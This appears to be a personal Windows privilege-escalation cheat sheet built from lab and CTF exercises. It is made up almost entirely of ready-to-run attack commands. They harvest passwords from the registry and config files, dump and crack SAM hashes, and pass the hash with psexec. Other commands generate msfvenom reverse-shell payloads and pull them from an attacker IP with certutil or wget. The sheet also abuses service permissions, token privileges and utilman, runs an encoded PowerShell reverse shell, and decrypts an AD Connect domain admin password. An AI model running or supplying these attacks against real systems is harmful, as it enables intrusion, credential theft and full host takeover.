Skip to content

Privilege Escalation

Kernel Exploits


windows-exploit-suggester

/opt/windows/windows-exploit-suggester systeminfo.txt -i "Elevation of Privilege" -e > exploits.txt
- -i - filter - -e - only with exploits

collection of exploits

  • https://github.com/SecWiki/windows-kernel-exploits

metasploit

msf> use post/multi/recon/local_exploit_suggester

Harvesting Passwords


πŸ”₯ Clear Text

Search through all files in current directory.

findstr /si password *.txt *.ini *.config

πŸ”₯ Reg

reg query HKLM /f password /t REG_SZ /s > pass1.txt
reg query HKCU /f password /t REG_SZ /s > pass2.txt

πŸ”₯ Leftover

When installing Windows on many hosts, administrators may use Windows Deployment Services. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

type C:\Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\system32\sysprep.inf
type C:\Windows\system32\sysprep\sysprep.xml

πŸ”₯ History

Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. powershell

cat ~\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

cd ~\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
ls
cat ConsoleHost_history.txt

πŸ”₯ RunAs / Saved Credentials

Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system.

cmdkey /list
While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
runas /savecred /user:Administrator cmd.exe

πŸ”₯ IIS Configuration

Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:

type C:\inetpub\wwwroot\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

πŸ”₯ Credentials From PuTTY

PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

SAM

The SAM (Security Account Manager) is a Microsoft Windows database that contains local account information such as usernames and passwords. The SAM database stores these details in an encrypted format to make them harder to be retrieved. Moreover, it can not be read and accessed by any users while the Windows operating system is running.Β However, there are various ways and attacks to dump the content of the SAM database.

πŸ”₯ Metasploit's HashDump.

The Metasploit framework uses in-memory code injection to the LSASS.exe process to dump copy hashes.

meterpreter> getuid
|-> 
THM\Administrator

meterpreter> hashdump
|->
Administrator:500:aad3...
Guest:501:aad3b435b514...
krbtgt:502:aad3b435b51...

Once we obtain NTLM hashes, we can try to crack them using Hashcat if they are guessable, or we can use different techniques to impersonate users using the hashes.

πŸ”₯ Volume Shadow Copy Service

Microsoft Volume shadow copy service, helps perform a volume backup while applications read/write on volumes.

More specifically, we will be using wmic to create a shadow volume copy. This has to be done through the command prompt with administrator privileges, as follows,

  1. Run the standard cmd.exe prompt with administrator privileges.
  2. Execute the wmic command to create a copy shadow of C: drive
C:\Users\Administrator>wmic shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
        ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
};
  1. Verify the creation from step 2 is available. Use the vssadmin,Β Volume Shadow Copy Service administrative command-line tool, to list and confirm that we have a shadow copy of the C: volume.
C:\Users\Administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {0c404084-8ace-4cb8-a7ed-7d7ec659bb5f}
   Contained 1 shadow copies at creation time: 5/31/2022 1:45:05 PM
        Original Volume: (C:)\\?\Volume{19127295-0000-0000-0000-100000000000}\
        Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
  1. Copy the SAM database from the volume we created in step 2 As mentioned previously, the SAM database is encrypted either with RC4 or AES encryption algorithms. In order to decrypt it, we need a decryption key which is also stored in the file's system in c:\Windows\System32\Config\system
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam 
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system 
  1. Download those files to your Kali machine and extract the hashes using
    /opt/tools/impacket/examples/secretsdump.py -sam /tmp/sam -system /tmp/system LOCAL
    

Once we obtain NTLM hashes, we can try to crack them using Hashcat if they are guessable, or we can use different techniques to impersonate users using the hashes.

πŸ”₯ Registry Hives

Windows registry also stores a copy of some of the SAM database contents to be used by Windows services.

  1. We can save the value of the Windows registry using the reg.exe tool. Ensure you run the command prompt with Administrator privileges.

    reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg
    reg save HKLM\system C:\users\Administrator\Desktop\system-reg
    

  2. Download those files to your Kali machine and extract the hashes using

    /opt/tools/impacket/examples/secretsdump.py -sam sam-reg -system system-reg LOCAL
    

Once we obtain NTLM hashes, we can try to crack them using Hashcat if they are guessable, or we can use different techniques to impersonate users using the hashes.

# Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::
hashcat -m 1000 --force 98d3a787a80d08385cea7fb4aa2a4261 /usr/share/wordlists/rockyou.txt

Scheduled Tasks


Overwrite task file

List scheduled task

schtasks
schtasks > schtasks.txt
Show task details
schtasks /query /tn vulntask /fo list /v
Check file permission
icacls c:\tasks\schtask.bat
Check file permission
C:\PrivEsc\accesschk.exe /accepteula -quvw user c:\tasks\schtask.bat
Overwrite file
echo c:\tools\nc64.exe -e cmd.exe 10.18.9.175 4444 > C:\tasks\schtask.bat
Run task
schtasks /run /tn vulntask

AlwaysInstallElevated


Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones).

Query registry values

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

  • To be able to exploit this vulnerability, both should be set 1 (0Γ—1).
  • Otherwise, exploitation will not be possible.

πŸ”₯ Exploiting with reverse shell

Generate a malicious .msi file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<KALI_IP> LPORT=<KALI_PORT> -f msi -o malicious.msi
Run the installer
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

πŸ”₯ Exploiting with PowerUp

run PowerUp script

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
Create a small GUI application (UserAdd.exe), where we will be able to add new user
Write-USerAddMSI

πŸ”₯ Exploiting with metasploit

use post explotation module

use exploit/windows/local/always_install_elevated

Service


πŸ”₯ Overwrite executable file

Vulnerability: Insecure Service Executables, If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially. img/service_executable.png

Option 1 list services with – PowerUp.ps1

. .\PowerUp.ps1
Invoke-AllChecks
|->
[*] Checking service executable and argument permissions...

ServiceName                     : filepermsvc
Path                            : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile                  : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'filepermsvc'
CanRestart                      : True

Option 2 use accesschk64.exe to find services

accesschk64.exe /accepteula
accesschk64.exe -uwcv Everyone *
-u suppres warnings, -w show only object with write access, -s show service name -v verbos

Query the service configuration [windows-cmd]

sc qc filepermsvc
use accesschk64.exe to get more information about service
accesschk64.exe -uwcv filepermsvc
Check the permissions on the executable [windows-ps]
icacls "C:\Program Files\File Permissions Service\filepermservice.exe"
accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
Let's generate an exe-service payload using msfvenom and serve it through a python webserver [linux]
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
Start server [linux]
python3 -m http.server
Start listener [linux]
nc -lvp 4444
We can then pull the payload from Powershell with the following command [windows-ps]
wget http://10.18.9.175:8000/rev-shell.exe -O rev-shell.exe
Overwrite service [windows-ps]
cd "C:\Program Files\File Permissions Service"
move filepermservice.exe filepermservice.exe.bkp
move C:\Users\thm-unpriv\rev-shell.exe filepermservice.exe
icacls filepermservice.exe /grant Everyone:F
Restart the service [windows-cmd]
sc stop filepermsvc
sc start filepermsvc

πŸ”₯ Unquoted service paths

find unquoted service path

Option 1 use PowerUp.ps1 script to find unqouted service path.

. .\PowerUp.ps1
Invoke-AllChecks

Option 2 list all services and path [windows-ps]

Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, PathName
check service configuration [windows-cmd]
sc qc "Disk Sorter Enterprise"

what is going on

Example path

C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
windows will search for - C:\MyPrograms\Disk.exe - C:\MyPrograms\Disk Sorter.exe - C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Check permission [windows-cmd]

icacls "c:\MyPrograms\Disk Sorter Enterprise\bin"
icacls "c:\MyPrograms\Disk Sorter Enterprise"
icacls "c:\MyPrograms"

attack

Overwrite service executable [windows-cmd]

icacls C:\MyPrograms\Disk.exe /grant Everyone:F

Restart the service [windows-cmd]

sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

πŸ”₯ Modified service configuration

Vulnerability: Insecure Service Permissions To Configuration

list all services [windows-ps]

Get-WmiObject win32_service | select Name, DisplayName, PathName

check service configuration

sc qc thmservice

check permissions of service [windows-ps]

  • https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
  • Open command prompt and type
  • check for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permission
    accesschk64.exe -qlc thmservice
    accesschk64.exe -wuvc thmservice
    
    Create exploit [linux]
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
    
    Start server [linux]
    python3 -m http.server
    
    Setup listener [linux]
    netcat -lvnp 4444
    
    We can then pull the payload from Powershell with the following command [windows-ps]
    wget http://10.18.9.175:8000/rev-shell.exe -O rev-shell.exe
    
    Grant access [windows-ps]
    icacls C:\Users\thm-unpriv\rev-shell.exe /grant Everyone:F
    
    Update service configuration [windows-cmd]
    sc config THMService binPath= "C:\Users\thm-unpriv\rev-shell.exe" obj= LocalSystem
    
    Stop and start [windows-cmd]
    sc stop THMService
    sc start THMService
    

πŸ”₯ Overwrite service registry configuration

  1. Check if we have conroll over reg key
    1. Using accesschk.exe, note that the registry entry for the regsvc service is writable by the NT AUTHORITY\INTERACTIVE group (essentially all logged-on users) πŸ”¨ accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
    2. OR, Using powershell Get-Acl πŸ”¨ powershell -ep bypass πŸ”¨ Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  2. Overwrite the ImagePath registry key to point to the reverse.exe executable you created
    reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
    
  3. start listener on kali
  4. start service on target
    net start regsvc
    
    or
    sc start regsvc
    

πŸ”₯ DLL Hijacking

  1. find DLL that can be hijacked
    • run Procmon β†’ part of Sysinternals
    • setup filter
      • 'Retult' 'is' 'NAME NOT FOUND'
      • 'Path' 'ends with' '.dll' img/service_dll_hijacking.png
  2. generate rev shell (or use windows_dll.c)
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 -f dll -o revshell.dll
    
  3. copy revshell.dll into C:\Temp as hijackme.dll
  4. restart service
    sc stop dllsvc
    sc start dllsvc
    

BypassUAC


  • https://github.com/CsEnox/EventViewer-UACBypass/blob/main/Invoke-EventViewer.ps1
    import-module .\Invoke-EventViewer.ps1
    Invoke-EventViewer C:\Windows\Tasks\shell_8444.exe
    

Windows Privileges


Info Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.

Each user has a set of assigned privileges that can be checked with the following command:

whoami /priv
From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on https://github.com/gtworek/Priv2Admin

πŸ”₯ SeRestorePrivilege

The SeRestorePrivilege privilege allows a user to circumvent file and directory permissions when restoring backed up files and directories, thus giving the user read and write access to system files.

We will use the EnableSeRestorePrivilege.ps1 script to enable this privilege in our PowerShell session. Let's begin by downloading it to our attacking machine.

wget https://raw.githubusercontent.com/gtworek/PSBits/master/Misc/EnableSeRestorePrivilege.ps1
certutil -urlcache -f http://192.168.45.5/EnableSeRestorePrivilege.ps1 EnableSeRestorePrivilege.ps1
./EnableSeRestorePrivilege.ps1

We should now have write access to C:\Windows\System32.

Utilman.exe Abuse with RDP

The utilman.exe is a built-in Windows application that is designed to allow users to configure system accessibility options such as the Magnifier, High Contrast Theme, Narrator, and On Screen Keyboard before they log in to the system.

This application is triggered by issuing the WIN + U key combination while on the Windows Logon screen. It's important to note that the application runs with SYSTEM privileges.

We can leverage our write access in the system directory C:\Windows\System32 to replace utilman.exe with cmd.exe.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> move C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> move C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>

If we can now trigger the application, it should grant us a SYSTEM shell. Let's give this a try using Remote Desktop Protocol with rdesktop.

rdesktop $IP

We'll issue WIN + U (CMD + U on Mac keyboards) on the logon screen to trigger the execution of utilman.exe. If all went well, the application should run cmd.exe with system-level integrity.

πŸ”₯ SeImpersonatePrivilege

PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10. To escalate privileges, the service account must have SeImpersonate privileges.

wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
certutil -urlcache -f http://192.168.45.226/PrintSpoofer.exe PrintSpoofer.exe
wget http://192.168.45.226/PrintSpoofer.exe -O PrintSpoofer.exe

./PrintSpoofer.exe -i -c "whoami"
./PrintSpoofer.exe -i -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
nc -lnvp 4445
|->
whoami
nt authority\system

πŸ”₯ SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.

Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.

on Windows, backup the SAM and SYSTEM hashes

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
on Windows, send files to SMB Server on Kali
copy C:\Users\THMBackup\sam.hive \\10.18.9.175\public\
copy C:\Users\THMBackup\system.hive \\10.18.9.175\public\
on Kali, retrieve the users password hashes
/opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:<LM>:<NTLM>:::
crack NTLM hash
hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
on Kali, login as administrator by hash
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.233.61

πŸ”₯ SeTakeOwnership

The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as a SYSTEM and take ownership of the service's executable.

cmd as administrator

whoami /priv
takeover the file
takeown /f C:\Windows\System32\Utilman.exe
give your user full permissions
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe
triger utilman - lock screen from the start button - click on the "Ease of Access" button

πŸ”₯ SeManageVolumePrivilege

According to this github repository:

This exploit grants full permission on C:\ drive for all users on the machine.

-   Enables the privilege in the token
-   Creates handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
-   Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545

Let's grab the compiled executable from the releases page.

We upload SeManageVolumeExploit.exe to the target and execute it. After execution, we discover that the Builtin Users group has full permissions on the Windows folder.

C:\xampp\htdocs\uploads>whoami
access\svc_mssql

C:\xampp\htdocs\uploads>SeManageVolumeExploit.exe
Entries changed: 865
DONE 

C:\xampp\htdocs\uploads>icacls C:/Windows
C:/Windows NT SERVICE\TrustedInstaller:(F)
           NT SERVICE\TrustedInstaller:(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(M)
           NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
           BUILTIN\Users:(M)
           BUILTIN\Users:(OI)(CI)(IO)(F)

Let's use WerTrigger from https://github.com/sailay1996/WerTrigger to acquire a SYSTEM shell.

To set it up we need to:

  1. Copy phoneinfo.dll to C:\Windows\System32
  2. Place Report.wer file and WerTrigger.exe in a same directory.
  3. Run WerTrigger.exe.
C:\xampp\htdocs\uploads\enox>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is CCC2-BF17

 Directory of C:\xampp\htdocs\uploads\enox

10/10/2021  07:25 PM    <DIR>          .
10/10/2021  07:25 PM    <DIR>          ..
10/10/2021  07:23 PM             9,252 Report.wer
10/10/2021  07:23 PM            15,360 WerTrigger.exe
               2 File(s)         24,612 bytes
               2 Dir(s)  50,123,882,496 bytes free

C:\xampp\htdocs\uploads\enox>WerTrigger.exe
WerTrigger.exe
c:/xampp/htdocs/uploads/nc.exe 192.168.118.23 4444 -e cmd.exe

Note : WerTrigger.exe will not produce any output and will just wait for you to type the instructions you want to perform.

β”Œβ”€β”€(kaliγ‰Ώkali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.118.23] from (UNKNOWN) [192.168.120.107] 49998
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami && hostname 
whoami && hostname 
nt authority\system
SERVER

C:\Windows\system32>

πŸ”₯ SeAssignPrimaryTokenPrivilege + SeImpersonatePrivilege

Name the user privileges that allows this exploit to work

whoami /priv
|->
SeImpersonatePrivilege
SeAssignPrimaryTokenPrivilege

Expose potato

cd /opt/windows/potato/
python3 -m http.server 80

Copy potato into Windows machine

certutil -urlcache -f http://192.168.45.195/RoguePotato.exe RoguePotato.exe 

Copy revshell into Windows machine

certutil -urlcache -f http://192.168.45.195/shell_ps_4445.exe shell_ps_4445.exe 

Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows

sudo socat tcp-listen:135,reuseaddr,fork tcp:$IP_WEB02:9999

Run the RoguePotato exploit to trigger a reverse shell running with SYSTEM privileges

.\RoguePotato.exe -r 192.168.45.195 -e "C:\ftp\shell_ps_4445.exe" -l 9999

AutoRuns


πŸ”₯ Overwrite autorun executable

  1. Find, apps that run on start
    1. Open Autoruns64.exe
    2. OR, query the registry for AutoRun executables reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. In Autoruns, click on the Logon tab.
  3. Let's assume you found, My Program entry.
    1. C:\Program Files\Autorun Program\program.exe
  4. Use accesschk64.exe to check permissionsΒ  v1. accesschk64.exe -wvu "C:\Program Files\Autorun Program\program.exe" v2. accesschk64.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
  5. In output, let's assume Everyone has FILE_ALL_ACCESS permission on the program.exe file.
  6. Next, overwrite program.exe with rshell.exe file.

Startup Applications.


πŸ”₯ Add new startup application

  1. Whoami (check username and groups)
    whoami
    whoami /groups
    
  2. Open command prompt and type
    icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    
  3. Compare your user groups with output
    1. BUILTIN\Users group has full access to the directory
  4. Exploitation
    • copy rshell.exe into C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    • Logoff & Login

Vulnerable software


  • dump information it can gather on installed software
    wmic product get name,version,vendor
    
  • check software in exploit.db

Groups


Azure Admins

Azure Admins https://blog.xpnsec.com/azuread-connect-for-redteam/ exploit.ps1

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server = 127.0.0.1; Database = ADSync;Initial Catalog=ADSync;Integrated Security = True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)

.\exploit.ps1
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!

DnsAdmins

DnsAdmins

Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. more and more

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 -f dll -o rev.dll
/opt/tools/impacket/examples/smbserver.py public .
rlwrap nc -lnvp 443
dnscmd.exe /config /serverlevelplugindll \\10.10.14.16\public\rev.dll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns

Server Operators

Server Operators BUILTIN\Server Operators

A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively;

  • create and delete network shares;
  • start and stop services;
  • back up and restore files;
  • format the hard disk of the computer;
  • and shut down the computer.
  • https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#server-operators
  • https://ss64.com/nt/syntax-security_groups.html#:~:text=A%20built%2Din%20group%20that,and%20shut%20down%20the%20computer.

SAM & SYSTEM


location 1 - C:\windows.old\Windows\System32\SAM - C:\windows.old\Windows\System32\SYSTEM

External